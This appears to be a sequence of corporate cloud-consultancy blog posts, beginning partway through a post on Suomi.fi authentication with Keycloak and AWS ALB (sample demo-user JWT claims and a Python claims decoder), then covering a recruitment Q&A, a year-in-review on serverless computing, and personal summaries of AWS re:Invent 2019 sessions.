    "custom:FI_VKPostitoimip": "TURKU",
    "sub": "765371aa-a8e8-4405-xxxxx-xxxxxxxx",
    "custom:FI_VKLahiosoite": "Mansikkatie 11",
    "custom:FI_firstName": "Nordea",
    "custom:FI_vtjVerified": "true",
    "custom:FI_KotikuntaKuntanro": "853",
    "custom:FI_displayName": "Nordea Demo",
    "identities": "[{\"userId\":\"72dae55e-59d8-41cd-a413-xxxxxx\",\"providerName\":\"Suomi.fi-kirjautuminen\",\"providerType\":\"OIDC\",\"issuer\":null,\"primary\":true,\"dateCreated\":1587460107769}]",
    "custom:FI_lastname": "Demo",
    "custom:FI_KotikuntaKuntaS": "Turku",
    "custom:FI_commonName": "Demo Nordea",
    "custom:FI_VKPostinumero": "20006",
    "custom:FI_nationalIN": "210281-9988",
    "username": "Suomi.fi-kirjautuminen_72dae55e-59d8-41cd-a413-xxxxxx",
    "exp": 1591106287,
    "iss": "https://cognito-idp.eu-west-1.amazonaws.com/eu-west-1_xxxxxx"
}
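
If the backend needs those claims as data, decoding them is a few lines of work. A minimal sketch in Python (in production the token’s signature should also be verified against the regional ALB public key endpoint documented by AWS):

import base64
import json

def alb_claims(x_amzn_oidc_data):
    """Decode the claims part of the ALB-provided JWT (no signature verification here)."""
    # A JWT is three base64url-encoded parts separated by dots: header.payload.signature
    payload = x_amzn_oidc_data.split(".")[1]
    payload += "=" * (-len(payload) % 4)        # restore any stripped padding
    return json.loads(base64.urlsafe_b64decode(payload))

# e.g. claims = alb_claims(request.headers["x-amzn-oidc-data"])
#      claims["custom:FI_nationalIN"], claims["username"], ...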

Security

There are multiple security elements and best practices in use in this solution as well. For example, each environment of each system has its own AWS account as the first security boundary, so there is a separate Keycloak installation for each environment.

There are a few secret strings that are generated into AWS Secrets Manager and injected into the Keycloak service at runtime by the Fargate task definition. For example, the OpenID client secret is generated and shared via AWS Secrets Manager; it is never published to a code repository etc.

Only the Suomi.fi realm of the Keycloak service is published; e.g. the admin panel of the default realm is not exposed to the internet. A realm is a Keycloak concept for hosting multiple solutions, with boundaries between them, inside a single Keycloak system.

Keycloak stores user profiles, but they can be cleaned up automatically if the project requires it.

About me

I’m a cloud architect/consultant for public sector customers in Finland at Solita. I have a long history with AWS. I found a newsletter from September 2008 announcing the EBS service. My brother and I were excited, commenting “finally, persistent storage for EC2”. EC2 was extended to Europe a month later. So I know for sure that I have used AWS services at least since 2008. Of course, the years have not all been the same, but it is nice to have some memories with you.

What have you always wanted to know about the life of Solita’s Cloud expert?

What’s it like to work at Solita and in the Cloud team? During recruitment meetings and discussions, candidates bring up a range of questions and preconceptions about life at Solita. I asked Helinä Nuutinen from our Cloud Services team in Helsinki to answer some of the most common ones. She might be a familiar face to those who’ve had a technical interview with us.

 

Helinä, could you tell us a little bit about yourself?

I’ve been with Solita for a year as a Cloud Service Specialist in the Cloud Services team. Before that, I worked with more traditional data centre and network services. I was particularly interested in AWS and DevOps, but the emphasis of my previous role was a little different. I participated in Solita’s AWS training, and before I knew it, I started working here.

Currently, I’m part of the operations team of our media-industry customer. Due to coronavirus, we’re working from home, getting used to the new everyday life. I have five smart and friendly teammates, with whom I would normally sit at the customer site from Monday through Thursday. The purpose of our team is to develop and provide tools and operational support services for development teams. We develop and maintain shared operational components such as code-based infrastructure with Terraform and Ansible, manage logs with the Elastic Stack, and look after DevOps tools and monitoring.

I typically spend my free time outdoors in Western Helsinki, take care of my window sill garden, and work on various crafting and coding projects. Admittedly, lately I haven’t had much energy to sit at the computer after work.

Let’s go through the questions. Are the following statements true or false?

#1 Solita’s Cloud team only works on cloud services, and you won’t succeed if you don’t know AWS, for example.

Practically false. Solita will implement new projects in the public cloud (AWS, Azure, GCP) if there are no regulatory maintenance requirements. We produce regulated environments in the private cloud together with a partner.

To succeed at Solita, you don’t have to be an in-depth expert on AWS environments – interest and background in similar tasks in more traditional IT environments is a great start. If you’re interested in a specific cloud platform, we offer learning paths, smaller projects, or individual tasks.

Many of our co-workers have learned the ins and outs of the public cloud and completed certifications while working at Solita. We are indeed learning at work.

#2 At Solita, you’ll be working at customer sites a lot.

Both true and false. In the Cloud team, it’s rare to sit at the customer site full time. We’re mindful of everyone’s personal preferences. I personally like working on site. Fridays are so-called office days when you have a great reason to visit the Solita office and hang out with colleagues and people you don’t normally meet.

In consulting-focused roles, you’ll naturally spend more time at the customer site, supporting sales as well.

(Ed. Note: Our customers’ wishes regarding time spent on site vary. In certain projects, it’s been on the rise lately. However, we will always discuss this during recruitment so that we’re clear on the candidate’s preferences before they join us.)

#3 Solita doesn’t do product development.

Practically false – we do product development, too. Our portfolio includes at least ADE (Agile Data Engine) and WhiteHat. Our Cloud Services team is developing our own monitoring stack, so we also do “internal development”.

(Ed. Note: The majority of Solita’s sales comes from consulting and customer projects, but we also do in-house product development. In addition to WhiteHat and Agile Data Engine, we develop Oravizio, for example. Together, these amount to about 2 MEUR. Solita’s net sales in 2019 was approximately 108 MEUR.)

#4 If you’re in the Cloud team, you need to know how to code.

Sort of. You don’t have to be a super coder. It also depends on what kind of projects you have in the pipeline. However, in the Cloud Services team, we build all infrastructure as code, do a lot of development work around our monitoring services, and code useful tools. We’re heavy users of Ansible, Python, Terraform and CloudFormation, among others, so scripting or coding skills are definitely an advantage.

#5 The team is scattered in different locations and works remotely a lot.

Sort of true. We have several Cloud team members in Helsinki, Tampere and Turku, and I would argue that you’ll always find a team mate in the office. You can, of course, work remotely as much as your projects allow. Personally, I like to visit the office once a week to meet other Solitans.

To ease separation, we go through team news and discuss common issues in bi-weekly meetings. During informal location-specific discussions, we share and listen to each other’s feedback.

#6 I have a lengthy background in the data centre world, but I’m interested in the public cloud. Solita apparently trains people in this area?

True. We offer in-house learning paths if you’re looking to get a new certification, for example, or are otherwise interested in studying a technology. You’ll get peer support and positive pressure to study at the same pace with others.

As mentioned earlier, public cloud plays a major role in our work, and it will only get stronger in the future. The most important thing is that you’re interested in and motivated to learn new things and work with the public cloud.

(Ed. Note: From time to time, we offer free open-to-all training programmes around various technologies and skills.)

#7 The majority of Solita’s public cloud projects are AWS projects.

True. I don’t have the exact figures, but AWS plays the biggest part in our public cloud projects right now. There’s demand for Azure projects in the market, but we don’t have enough people to take them on.

(Ed. Note: The share of Azure is growing fast in our customer base. We’re currently strengthening our Azure expertise, both by recruiting new talents, and by providing our employees with the opportunity to learn and work on Azure projects.)

#8 Apparently Solita has an office and Cloud experts in Turku?

Yes! In Turku, we have six Cloud team members: four in the Cloud Services team (including subcontractors) plus Antti and Toni who deliver consulting around cloud services. I haven’t been to the office but I hear it’s fun.

(Ed. Note: Solita has five offices in Finland: Tampere, Helsinki, Oulu, Turku and Lahti. At the moment, Cloud is represented in all other cities except Oulu and Lahti.)

#9 Solita sells the expertise of individuals. Does this mean I’d be sitting at the customer site alone?

Mostly a myth. It depends on the project – some require on-site presence from time to time, but a lot of work can be done flexibly in the office or remotely. No one will be forced to sit at the customer site alone. Projects include both individual and team work. This, too, largely depends on the project and the employee’s own preferences.

#10 Solita doesn’t have a billing-based bonus.

True. If we have one, no one has told me.

(Ed. Note: Solita’s compensation model for experts is based on a monthly salary.)

#11 Solita only works with customers in the public sector.

False. Solita has both public and private sector customers, from many different industries.

(Ed. Note: In 2019, around 55% of our Cloud customers were from the private sector.)

#12 Projects require long-term commitment, so you’ll be working on the same project for a long time.

True, if that’s what you want! When I started at Solita, my team lead asked me in advance what kind of projects I’d like to be part of, and what would be an absolute no-no. I’m happy to note that my wishes have actually been heard. But it might be because I’m not picky. Projects can last from a few days to years, and people might be working on several projects at the same time. Of course, you can also rotate between projects, so a final commitment isn’t necessary.

Helinä was interviewed by Minna Luiro who’s responsible for the Cloud unit’s recruiting and employer image at Solita. Do you have more questions or thoughts around the above topics? You can reach out to Minna: +358 40 843 6245 or minna.luiro@solita.fi.

If you’re excited about the idea of joining Solita’s Cloud team, send us an open application. You can also browse our vacancies.

One year of cloud

It has been 12 months since I took a leap into the exciting world of cloud consulting. It is time to look back and throw out some predictions for 2020.

I started my career with cloud at Hewlett Packard aeons ago. At that time the cloud was really immature and we had a huge variety of problems with even basic IaaS deployments. However, even then the benefits were so evident that we thought it was really worth it. Customers were eager to have faster deployments, so somewhat unstable platforms did not seem like a big problem at all.

Along came OpenStack with its promise to simplify and unify things. I still have nightmares about upgrading OpenStack installations (although I have heard that it has gotten better now). Yes, we did some NFV-related things with it, as it was the only option back then.

The world has changed a lot during these years and in the last 12 months I think the pace is speeding up even more.

Joining Solita

I joined Solita’s cloud consulting unit last January with high hopes and a little bit of fear. But after the warm welcome I got from my colleagues (especially Antti Heinonen) and a comprehensive introduction to working at Solita, I immediately felt at ease (thanks again, Antti). This would be the place where I can make a real impact. Working for Solita has proven to be what I imagined it would be: lots of freedom, but also lots of responsibility to take. This is not for everyone, but for me it works.

During these months I have seen the demand for cloud competency in Finland rise to a whole new level. Customers are really looking to get serious with cloud adoption, if they have not done so already. Microservice architectures with containers and FaaS-based offerings are taking off even more.

My projects have varied a lot during this year, ranging from simple cloud deployments to complete cloud strategy and governance projects.
One of the key skills here is that you need to put yourself in the shoes of the client, and you really need to be aware of all aspects of modern business. Only that way can you really evaluate how to use the cloud in the client’s best interest. I won’t go into detail in this post on what has happened on the tech side during these 12 months, as the cloud evolves so fast that it is pointless to list all the new features.

Crystal ball

I estimate that there will be some demand for on-premises cloud during 2020. Azure Stack and AWS Outposts both seem pretty interesting, and I hope we see some cases with those. The price tag is quite big, but not impossible, if you have a real use for them.
Serverless will keep on winning, as its benefits are so obvious, even if there are some hiccups with the management layer from time to time (this needs its own blog entry).

It’s difficult to make predictions, especially about the future. But I will make one clear prediction: FaaS will rule even more during 2020. There are some clear benefits, especially for DevOps-minded developers. It takes the focus away from infrastructure even more, and true IaC deployments are easier to do. It is more cost-effective, as resources are only used when code is executed. Scaling is easier and more immediate than on legacy VMs or containers.

There are some rules of thumb to keep in mind when working with FaaS services. Limit a single function to a single action, limit its scope and keep functions lightweight. Pay attention when using libraries; they have a tendency to slow down functions. Keep functions isolated and don’t call functions from other functions.

Cold starts

With FaaS there is the inevitable discussion about cold starts. The problem is that when running functions which are not “warm”, it takes some time to bring the infrastructure up and running. Usually the delay is around 2–3 seconds, which is a deal breaker for some usage. But there are some workarounds for this, and vendors are constantly improving it.

AWS is also a bit ahead here and announced provisioned concurrency at re:Invent 2019, which basically keeps your Lambdas “warm” and cuts the latency. Look for a summary here: https://serverless.com/blog/aws-lambda-provisioned-concurrency/
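
Enabling it is a small API call; for example with boto3 (the function and alias names are made up):

import boto3

lambda_client = boto3.client("lambda")

# Keep five execution environments warm for the "live" alias of a made-up function
lambda_client.put_provisioned_concurrency_config(
    FunctionName="my-api-handler",
    Qualifier="live",
    ProvisionedConcurrentExecutions=5,
)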

Check out Mikhail Shilkov’s analysis of cold starts on AWS, Azure and GCP: https://mikhail.io/serverless/coldstarts/big3/

To summarize last year: it has been a very busy year for our team, and I think in 2020 we are going to do some great things again.
I hope to see some new colleagues in our team, so if you are interested in working at Solita, don’t hesitate to contact me for a chat at +358 401897586, toni.kuokkanen@solita.fi or tuwww @IRCnet

My Summary of AWS re:Invent 2019

The re:Invent event for 2019 is officially over. However, learning and innovation never stop. It was a full week of learning new things, mingling with other AWS users and basically having a good time in Las Vegas. You can continue learning by following the AWS Events YouTube channel: https://www.youtube.com/channel/UCdoadna9HFHsxXWhafhNvKw

Personally, I would like to thank all my colleagues, Solita’s customers and the event organisation’s staff for a simply magnificent conference. Thanks!

As fresh as I could be after a re:Invent.

The view of Oakland in the second picture was very pretty. The gentleman next to me from Datadog said that he has landed at SFO tens of times, and our plane’s approach direction was a first for him too. Amazing view!

It’s not just about the services, actually it’s more about having the bold mindset to try new things

You don’t have to be an expert in everything you do. If you are, it probably means that you are not following what is out there and are repeatedly doing things that are already familiar to you. I am not saying you always have to be Gyro Gearloose. I mean that you should push the limits a bit, take controlled risks for reward and have the will to learn new things.

The three announcements that caught my attention

Fargate Spot. That is what my project has been waiting for for a while. It will bring cost savings and make it possible to stop using EC2-backed ECS clusters for cost optimization purposes. The rule of thumb is that you can save 70% of your costs with Spot capacity.

Outposts. I really like the idea that you can get AWS-ecosystem-integrated computing power right inside corporate data centers. Hybrid environments are the only way forward for many customers. I would like to see some kind of control panel inside the Outpost in the future. For now, all information indicates that you basically cannot manage the servers inside an Outpost beyond the OS level (e.g. logging in via SSH or Remote Desktop).

Warm Lambdas. I think most Lambda developers have thought about warming up their Lambda resources manually via CloudWatch Events etc. This simplifies the work, the way it should always have been. Now you can be sure that if a request comes in, you will have some warm computing capacity to serve it fast. The pricing starts from 1.50 $/month per 128 MB for one provisioned concurrency (= warm Lambda).

re:Play 2019 photos

We organized a pre-party at The Still in the Mirage beforehand.

Would you like to hear more about what happens at re:Invent 2019? Sign up to our team’s WhatsApp group to chat with them, and register for the What happens in Vegas won’t stay in Vegas webinar to hear a whole sum-up after the event.


My Thursday at AWS re:Invent 2019

Keynote by Dr. Werner Vogels

Dr. Vogels is the CTO of AWS. The keynote started with very detailed information about virtual machine architecture and its evolution during the last 20–25 years. He said that the AWS Nitro microVM is maybe the most essential component for providing a secure and performant virtual machine environment. It has enabled rapid development of new instance types.

Ms. Clare Liguori (Principal Software Engineer, AWS) gave detailed information about the container services. In AWS there are two container platforms: ECS on EC2 with virtual machines, and the serverless Fargate. If you compare scaling speed, the Fargate service can follow the needed capacity much faster and avoid under-provisioning (for performance) and over-provisioning (for cost savings). With ECS on EC2 you have two scaling phases: first you need to scale up your EC2 instances and after that launch the tasks.

During the keynote, Mr. Jeff Dowds (Information Technology Executive, Vanguard) told about their journey from the corporate data center to AWS. Vanguard is a registered investment advisor company located in the USA with over 5 trillion US dollars in assets. Mr. Dowds backed up the benefits of the public cloud with hard facts: 30% savings in compute costs, 30% savings in build costs, and finally a 20x deployment frequency thanks to automation. Changing the deployment mindset is, I think, the most important change for Vanguard. As the slides said, they now have the ability to innovate!

Building a pocket platform as a service with Amazon Lightsail – CMP348

Mr. Robert Zhu (Principal Technical Evangelist, AWS) held a chalk talk session about the Amazon Lightsail service. He started by saying that this would be the most anti-re:Invent talk in terms of scaling, high availability and so on. The crowd laughed out loud.

In the chalk talk the example app to deploy was a progressive web app (PWA). PWAs try to look like a native app, e.g. on different phones. They typically use the web browser under the hood, with UI code shared between operating systems.

The Lightsail service provides public static IP addresses and a simple DNS service that you can use to connect the static IP address to your user-friendly domain name. It supports wildcard records and a default record, which is nice. The price of outbound traffic is very affordable: the 10 USD plan includes 2 TB of outbound traffic.
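
As a small illustration of how little is needed, a hedged boto3 sketch for attaching a static IP and pointing a DNS record at it might look like the following (the resource names and domain are hypothetical, and the instance and DNS zone are assumed to already exist):

```python
import boto3

lightsail = boto3.client("lightsail")

# Hypothetical names: a new static IP, an existing instance and an existing DNS zone.
lightsail.allocate_static_ip(staticIpName="pocket-paas-ip")
lightsail.attach_static_ip(staticIpName="pocket-paas-ip",
                           instanceName="pocket-paas-instance")

ip_address = lightsail.get_static_ip(
    staticIpName="pocket-paas-ip")["staticIp"]["ipAddress"]

# Point an A record in the Lightsail DNS zone at the instance's static IP.
lightsail.create_domain_entry(
    domainName="example.com",
    domainEntry={"name": "app.example.com", "type": "A", "target": ip_address},
)
```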

We spent a lot of time on how to configure a server in the traditional way over an SSH prompt: installing Docker, acquiring a certificate from Let’s Encrypt and so on.

The Lightsail service has no connection to a VPC, no IAM roles, and so on. It is basically just a virtual server, so it is not suited for building a modern enterprise public cloud experience.

Selecting the right instance for your HPC workloads – CMP409

Mr. Nathan Stornetta (Senior Product Manager, AWS) held this builder session. He is the product manager for AWS ParallelCluster. With on-premises solutions you almost always need to make choices about what to run and when to run it. With the public cloud’s elastic capacity you don’t have to queue for resources, and you don’t pay for what you are not using.

The term HPC stands for high-performance computing, which basically means that your workload does not fit into one server and you need a cluster of servers with high-speed networking. Within the cluster, the proximity between servers is essential.

In AWS there are more than 270 different instance types. Selecting the right instance type requires experience with both the workload and the offering. Here is a nice cheat sheet for instance types:

If your workload needs high-performance disk I/O in and out of the server, the default AWS-recommended choice would be the Amazon FSx for Lustre cluster storage solution.

If you decide to use the Elastic File System (EFS) service, you should first think about how much throughput you need rather than how much storage you need. EFS is designed to give throughput in proportion to the amount of data stored; the figure given was 200 MB/s per 1 TB of data. So, you should decide on the needed throughput first so that your application has enough I/O bandwidth in use. For example, with that ratio a file system holding only 500 GB would get roughly 100 MB/s.

The newest option is the Elastic Fabric Adapter (EFA), which was announced a couple of months ago. More information about EFA can be found here: https://aws.amazon.com/hpc/efa/

If you don’t have experience of which storage would work best for your workload, it is strongly recommended to test each option and make the decision after that.

Intelligently automating cloud operations – ENT305

This was a workshop session. In workshop sessions there are multiple tables working on the same topic, whereas in a builder session there is one small table per topic. So, there were more than a hundred people doing the same exercise.

First Mr. Francesco Penta (Principal Cloud Support Engineer, AWS) and Mr. Tipu Qureshi (Principal Engineer, AWS) gave a short overview of the services used in the session. I want to mention a few of them. AWS Health keeps track of the health of different services in your account. For example, it can alert you if your ACM certificate cannot be renewed automatically (e.g. because of missing DNS records) or if a VPN tunnel is down.
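
As a hedged sketch, you can also query these events programmatically. Note that the AWS Health API requires a Business or Enterprise support plan, and the filter values below are just an example:

```python
import boto3

# The AWS Health API is served from the global endpoint in us-east-1.
health = boto3.client("health", region_name="us-east-1")

response = health.describe_events(
    filter={
        "eventStatusCodes": ["open", "upcoming"],
        "eventTypeCategories": ["issue", "scheduledChange"],
    }
)
for event in response["events"]:
    print(event["eventTypeCode"], event["region"], event["statusCode"])
```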

The other service was AWS Auto Scaling’s predictive scaling. It is important if you want to avoid bigger under-provisioning. When you scale only on, say, a CPU metric from the last 5 minutes, you are already late. Also, if your horizontal scaling needs a while to get new nodes into service, predictive scaling helps you get more stable performance.
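
The workshop used ready-made resources, but as a rough, non-authoritative sketch, enabling predictive scaling for an Auto Scaling group through an AWS Auto Scaling scaling plan could look something like this (the plan name, tag filter and Auto Scaling group are hypothetical):

```python
import boto3

autoscaling_plans = boto3.client("autoscaling-plans")

autoscaling_plans.create_scaling_plan(
    ScalingPlanName="web-fleet-plan",
    ApplicationSource={"TagFilters": [{"Key": "app", "Values": ["web"]}]},
    ScalingInstructions=[
        {
            "ServiceNamespace": "autoscaling",
            "ResourceId": "autoScalingGroup/web-fleet-asg",
            "ScalableDimension": "autoscaling:autoScalingGroup:DesiredCapacity",
            "MinCapacity": 2,
            "MaxCapacity": 20,
            # Reactive part: target tracking keeps average CPU around 50%.
            "TargetTrackingConfigurations": [
                {
                    "PredefinedScalingMetricSpecification": {
                        "PredefinedScalingMetricType": "ASGAverageCPUUtilization"
                    },
                    "TargetValue": 50.0,
                }
            ],
            # Predictive part: forecast the load from history and scale ahead of it.
            "PredefinedLoadMetricSpecification": {
                "PredefinedLoadMetricType": "ASGTotalCPUUtilization"
            },
            "PredictiveScalingMode": "ForecastAndScale",
        }
    ],
)
```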

The workshop can be found here: https://intelligent-cloud-operations.workshop.aws/

I’m familiar with the tooling, so I could have yelled Bingo as one of the first people to finish. I was happy to finish early and go to the hotel for a short break before Solita’s customer event and re:Play. re:Play starts at 8 pm at the Las Vegas Festival Grounds with music, food, drinks and more than 30,000 pairs of eyes.

My Wednesday at AWS re:Invent 2019

It was an early morning today because the alarm clock woke me up around 6 am. The day started with the Worldwide Public Sector keynote at 7 am in the Venetian Palazzo O hall.

Worldwide Public Sector Breakfast Keynote – WPS01

This was my first time taking part in the Public Sector keynote. I’m not sure how worldwide it was. At least Singapore and Australia were mentioned, but I cannot remember anything specific being said about Europe.

Anyone who follows the international security industry even a little cannot have missed how many cities, communities and other organizations have faced ransomware attacks. Some victims paid the ransom in Bitcoin, some did not pay, and many victims just stay quiet. The public cloud environment is a great way to protect your infrastructure and important data. Here is a summary of how to protect yourself:

RMIT University from Australia has multiple education programs for AWS competencies, and it was announced that they are now an official AWS Cloud Innovation Centre (CIC). Typical students have some educational background (e.g. a bachelor’s degree in IT) and want to make a move in the job market through re-education. Sounds like a great way to do it!

The speaker, Mr. Martin Bean from RMIT, showed a picture from The Jetsons (1963, by Hanna-Barbera Productions) that already featured multiple things that were invented for mass markets much later. Mr. Bean also mentioned two things that got my attention: more people own a cellphone than a toothbrush, and 50 percent of jobs are going to transform into something else in the next 20 years.

Visit to expo area

After the keynote I visited the expo in the Venetian Sands Expo area before heading to the Aria for the rest of Wednesday. The expo was huge, noisy, crowded and so on. The more detailed experience from last year was enough for me. At the AWS Cloud Cafe I took a panorama picture, and that was it, I was ready to leave.

I took the shuttle bus towards the Aria. I was very happy that the bus driver dropped us off next to the main door of the Aria hotel, which saves on average 20-30 minutes of queueing in Aria’s parking garage. An important change! On the way I passed the Manhattan skyline of New York-New York.

Get started with Amazon ElastiCache in 60 minutes – DAT407

Mr. Kevin McGehee (Principal Software Engineer, AWS) was the instructor for the Amazon ElastiCache for Redis builder session. In the session we logged in to the AWS console, opened a Cloud9 development environment and then just followed the clearly written instructions.

The guide for the builder session can be found here: https://reinvent2019-elasticache-workshop.s3.amazonaws.com/guide.pdf

This session was about how to import data into Redis with Python, and how to index and refine the data during the import phase. In the refinement the data becomes information with aggregated scoring, geolocation and so on, which is easier for the requester to use. That was interesting and looked easy.
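
A rough sketch of the same idea with the redis-py client (hypothetical endpoint and sample data; redis-py 4.x call signatures):

```python
import redis

# Hypothetical ElastiCache endpoint and sample data for illustration.
r = redis.Redis(host="my-cluster.xxxxxx.0001.use1.cache.amazonaws.com", port=6379)

restaurants = [
    {"name": "Blue Diner", "rating": 4.2, "lon": -115.1728, "lat": 36.1147},
    {"name": "Red Grill",  "rating": 3.8, "lon": -115.1398, "lat": 36.1699},
]

for item in restaurants:
    # Sorted set: rank restaurants by an aggregated score.
    r.zadd("restaurants:by_rating", {item["name"]: item["rating"]})
    # Geo set: store coordinates so they can be queried by distance later.
    r.geoadd("restaurants:geo", (item["lon"], item["lat"], item["name"]))

# Top-rated restaurants, best first.
print(r.zrevrange("restaurants:by_rating", 0, 4, withscores=True))
# Restaurants within 5 km of a given point.
print(r.georadius("restaurants:geo", -115.15, 36.12, 5, unit="km"))
```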

Build an effective resource compliance program – MGT405

Mr. Faraz Kazmi (Software Development Engineer, AWS) held this builder session.

Conformance packs under the AWS Config service were published last week. They can be integrated at the AWS Organizations level in your account structure. With conformance packs you can group Config rules (roughly, governance rules for common settings) easily in a YAML-format template and get a consolidated view over those rules. There are a few AWS-managed packs currently available, for example the “Operational Best Practices For PCI-DSS” pack. It’s clear that AWS will provide more and more of these rule sets in the upcoming months, and so will the community via GitHub.
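
As a hedged sketch, deploying a minimal conformance pack with boto3 might look like the following; the pack name, the delivery bucket and the single-rule template are hypothetical:

```python
import boto3

config = boto3.client("config")

# A minimal, hypothetical conformance pack template with one AWS managed rule
# that flags S3 buckets allowing public read access.
template_body = """
Resources:
  S3PublicReadProhibited:
    Type: AWS::Config::ConfigRule
    Properties:
      ConfigRuleName: s3-bucket-public-read-prohibited
      Source:
        Owner: AWS
        SourceIdentifier: S3_BUCKET_PUBLIC_READ_PROHIBITED
"""

config.put_conformance_pack(
    ConformancePackName="baseline-s3-controls",
    TemplateBody=template_body,
    DeliveryS3Bucket="my-config-delivery-bucket",  # hypothetical pre-existing bucket
)
```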

There are a timeline view and a compliance view of all your resources, which makes this a very effective tool for getting a consolidated view of resource compliance.

You can find the material here: https://reinvent2019.aws-management.tools/mgt405/en/

By the way, if you cannot find conformance packs, you are possibly using the old Config service UI in the AWS Console. Make sure to switch to the new UI; all new features are only added to the new UI.

The clean-up phase in the guide is not perfect. In addition to the guide, you have to manually delete the SNS topic and the IAM roles that were created by the wizards. It was a disappointment that no sandbox account was provided.

Best practices for detecting and preventing data exposure – MGT408

Ms. Claudia Charro (Enterprise Solutions Architect, AWS) from Brasilia was the teacher in this session. It was very similar to my previous session, which I was not aware of beforehand. In both sessions we used Config rules and blocked public S3 usage.

The material can be found here: https://reinvent2019.aws-management.tools/mgt408/en/cont/testingourenforcement.html

AWS Certification Appreciation Reception

The Wednesday evening started (as usual) with the reception for certified people at the Brooklyn Bowl. It is again a nice venue to have some food, drinks and music, and to mingle with other people. I’m writing this around 8 pm, so I left a bit early to get a good night’s sleep for Thursday, which is the last full day.

Photos: Brooklyn Bowl outside, inside, the bowling lanes and the dance floor.

On the way back to my hotel (Paris Las Vegas) I found a version 3 Tesla Supercharger station, which was one of the first v3 stations in the world. It was not too crowded. The station was big compared with the Supercharger stations in Finland. The v3 Supercharger stations can provide up to 250 kW of charging power for the Model 3 Long Range (LR), which has a 75 kWh battery. I would have liked to see the new (experimental) Cybertruck model.
